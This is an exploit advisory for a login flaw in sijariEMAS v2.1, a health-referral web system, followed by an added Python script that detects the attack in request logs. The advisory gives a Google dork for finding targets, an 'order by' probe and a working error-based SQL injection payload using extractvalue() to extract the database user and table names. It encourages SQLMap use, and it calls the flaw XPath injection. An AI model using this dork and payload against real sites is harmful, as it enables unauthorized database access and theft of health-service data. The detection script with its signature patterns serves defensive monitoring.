[+]Exploit Title: sijariEMAS v2.1 Login Xpath Injection Vulnerability
[+]Author: ./Sn00py
[+]Team: Indonesian Code Party
[+]Google Dork: "Intext:Sistem Informasi dan Komunikasi Jejaring Rujukan Pelayanan Kesehatan"
[+]Tested on: Linux Parrot
[+]Vendor: http://sijariemas.net/
=======================================
[+]Proof Of Concept: First, find out whether the site has a login feature. If you enter a plain string there, there will be no error, but if you continue with 'order by 100-- the error "Unknown column '100' in 'order clause'" will appear, which means the site is vulnerable to SQL injection attacks.
[+]Exploit:
' and extractvalue(0x0a,concat(0x0a,user(),0x0a,(select table_name from information_schema.tables where table_schema=database() limit 1,1)))-- -
You can use SQLMap or do a manual injection using XPath injection to get the web database.
[+]Demo? No Demo ^^ Happy Injecting~
Greetz: Khatulistiwa - DarkOct02 - Indonesian Code Party - RSFLT - N45HT - PacmanCorp - AllindonesiaDefacer
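
[+]Detection (added example, not part of the original advisory or the vendor's code): the two request shapes described above, the 'order by' probe and the extractvalue() error-based payload, can be flagged in login request logs together with whether the database error was returned to the client. The tab-separated log format, the sample lines and the updatexml signature are assumptions constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Request-body signatures for the two inputs the advisory describes.
# updatexml is added as the sibling MySQL XML function (assumption: it is
# not mentioned in the advisory).
SIGNATURES = {
    "order-by-probe": re.compile(r"'\s*order\s+by\s+\d+\s*(--|#)", re.I),
    "xpath-error-function": re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I),
}
# MySQL error text that reaches the client when errors are displayed.
ERROR_LEAK = re.compile(r"Unknown column '\d+' in 'order clause'|XPATH syntax error")

# Constructed sample log (hypothetical format, tab-separated):
# time, client, path, URL-encoded POST body, response snippet
SAMPLE_LOG = """\
2024-01-01T10:00:00Z\t203.0.113.5\t/login\tusername=admin&password=secret\tInvalid login
2024-01-01T10:00:09Z\t203.0.113.9\t/login\tusername=x%27order+by+100--+&password=a\tUnknown column '100' in 'order clause'
2024-01-01T10:00:15Z\t203.0.113.9\t/login\tusername=x%27+and+extractvalue%280x0a%2Cconcat%280x0a%2Cuser%28%29%29%29--+-&password=a\tXPATH syntax error
2024-01-01T10:01:00Z\t198.51.100.7\t/login\tusername=o%27brien&password=pw\tInvalid login
"""

def scan(log_text):
    """Return one finding per log line whose decoded body matches a signature."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, ip, path, body, response = line.split("\t")
        decoded = unquote_plus(body)  # signatures must see the decoded input
        hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
        if hits:
            findings.append({
                "time": ts, "client": ip, "path": path, "signatures": hits,
                # True: the SQL error was echoed back, so input reached the
                # query unparameterized and error display is enabled.
                "error_leaked": bool(ERROR_LEAK.search(response)),
            })
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with error_leaked set to True indicates both root causes are present: login input is concatenated into the SQL statement instead of being bound as a parameter, and database errors are shown to the user.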